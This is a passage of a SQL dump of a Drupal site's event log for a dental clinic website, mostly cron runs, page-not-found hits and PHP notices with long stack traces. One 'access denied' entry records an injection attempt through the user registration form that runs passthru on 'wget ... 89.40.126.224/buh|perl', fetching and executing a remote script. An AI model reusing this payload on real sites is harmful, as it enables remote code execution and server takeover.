@module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"80.07ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4456,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4457,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:69:\"/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/\";}',4,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252012),(4458,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4459,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:6:\"8.58ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4460,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"13.24ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4461,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"2.18ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4462,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"10.65ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4463,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.07ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4464,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"3.16ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4465,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:5:\"0.8ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4466,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"13.77ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4467,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"11.39ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4468,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"46.78ms\";}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4469,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://www.clidentcastelo.pt/pt/ms/ms/servicos-clinicos-dentarios-4700-311-braga/ms-90047454-p-2/','','54.36.148.140',1580252013),(4470,0,'access denied','@uri',_binary 'a:1:{s:4:\"@uri\";s:156:\"/user/register/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+89.40.126.224%2Fbuh%7Cperl&name%5B%23type%5D=markup\";}',4,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580257842),(4471,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11368:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580257843),(4472,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11360:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): 